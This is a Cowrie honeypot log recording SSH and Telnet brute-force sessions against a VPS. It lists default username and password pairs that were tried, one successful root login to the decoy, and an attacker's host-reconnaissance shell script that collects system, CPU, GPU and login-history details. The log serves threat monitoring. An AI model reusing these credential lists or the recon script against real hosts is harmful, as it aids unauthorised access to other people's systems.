{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:37.679986Z","src_ip":"212.227.235.229","session":"0a7e73f55c31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40348,"dst_ip":"1.2.3.4","dst_port":22,"session":"440a5b954e82","protocol":"ssh","message":"New connection: 212.227.125.160:40348 (1.2.3.4:22) [session: 440a5b954e82]","sensor":"my-vps","timestamp":"2025-08-31T04:53:37.681107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:53:37.681635Z","src_ip":"212.227.125.160","session":"440a5b954e82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:53:37.863604Z","src_ip":"212.227.125.160","session":"440a5b954e82"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:38.400512Z","src_ip":"212.227.235.229","session":"43b9dc9914d4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:38.414154Z","src_ip":"212.227.125.160","session":"440a5b954e82"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:39.559680Z","src_ip":"212.227.235.229","session":"e71bd23f64e4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:39.585103Z","src_ip":"212.227.235.229","session":"a464dc5f9092"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:39.597800Z","src_ip":"212.227.125.160","session":"440a5b954e82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48324,"dst_ip":"1.2.3.4","dst_port":22,"session":"e71bb5002e74","protocol":"ssh","message":"New connection: 212.227.235.229:48324 (1.2.3.4:22) [session: e71bb5002e74]","sensor":"my-vps","timestamp":"2025-08-31T04:53:40.209733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:40.215414Z","src_ip":"212.227.235.229","session":"e71bb5002e74"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:40.511631Z","src_ip":"212.227.235.229","session":"e71bb5002e74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56042,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ba7e3972572","protocol":"ssh","message":"New connection: 212.227.235.229:56042 (1.2.3.4:22) [session: 8ba7e3972572]","sensor":"my-vps","timestamp":"2025-08-31T04:53:40.577026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:53:40.577753Z","src_ip":"212.227.235.229","session":"8ba7e3972572"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:53:40.710876Z","src_ip":"212.227.235.229","session":"8ba7e3972572"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:41.095482Z","src_ip":"212.227.235.229","session":"e71bd23f64e4"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc-123","message":"login attempt [user/abc-123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:41.263428Z","src_ip":"212.227.235.229","session":"8ba7e3972572"}
{"eventid":"cowrie.login.failed","username":"carol","password":"carol","message":"login attempt [carol/carol] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:41.785393Z","src_ip":"212.227.235.229","session":"e71bb5002e74"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:42.211090Z","src_ip":"212.227.235.229","session":"a464dc5f9092"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:42.391224Z","src_ip":"212.227.235.229","session":"8ba7e3972572"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:43.359087Z","src_ip":"212.227.235.229","session":"e71bb5002e74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56984,"dst_ip":"1.2.3.4","dst_port":22,"session":"47bca5f05f7d","protocol":"ssh","message":"New connection: 212.227.235.229:56984 (1.2.3.4:22) [session: 47bca5f05f7d]","sensor":"my-vps","timestamp":"2025-08-31T04:53:43.831965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:43.881976Z","src_ip":"212.227.235.229","session":"47bca5f05f7d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:44.151849Z","src_ip":"212.227.235.229","session":"47bca5f05f7d"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:45.638305Z","src_ip":"212.227.235.229","session":"47bca5f05f7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45944,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c5ccb7841bf","protocol":"ssh","message":"New connection: 212.227.235.229:45944 (1.2.3.4:22) [session: 4c5ccb7841bf]","sensor":"my-vps","timestamp":"2025-08-31T04:53:45.713753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:53:46.484042Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:53:46.484679Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:47.578891Z","src_ip":"212.227.235.229","session":"47bca5f05f7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48328,"dst_ip":"1.2.3.4","dst_port":22,"session":"21be92a7cb98","protocol":"ssh","message":"New connection: 212.227.235.229:48328 (1.2.3.4:22) [session: 21be92a7cb98]","sensor":"my-vps","timestamp":"2025-08-31T04:53:47.624324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:47.626218Z","src_ip":"212.227.235.229","session":"21be92a7cb98"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:47.984464Z","src_ip":"212.227.235.229","session":"21be92a7cb98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40140,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c7eb71511f6","protocol":"ssh","message":"New connection: 212.227.235.229:40140 (1.2.3.4:22) [session: 2c7eb71511f6]","sensor":"my-vps","timestamp":"2025-08-31T04:53:48.188351Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37922,"dst_ip":"1.2.3.4","dst_port":23,"session":"cde00313e218","protocol":"telnet","message":"New connection: 212.227.125.160:37922 (1.2.3.4:23) [session: cde00313e218]","sensor":"my-vps","timestamp":"2025-08-31T04:53:48.273365Z"}
{"eventid":"cowrie.login.failed","username":"db2inst2","password":"db2inst2","message":"login attempt [db2inst2/db2inst2] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:51.076597Z","src_ip":"212.227.235.229","session":"21be92a7cb98"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567","message":"login attempt [root/1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:53:52.224606Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:53.905770Z","src_ip":"212.227.235.229","session":"21be92a7cb98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:53:54.022981Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.023646Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.024284Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
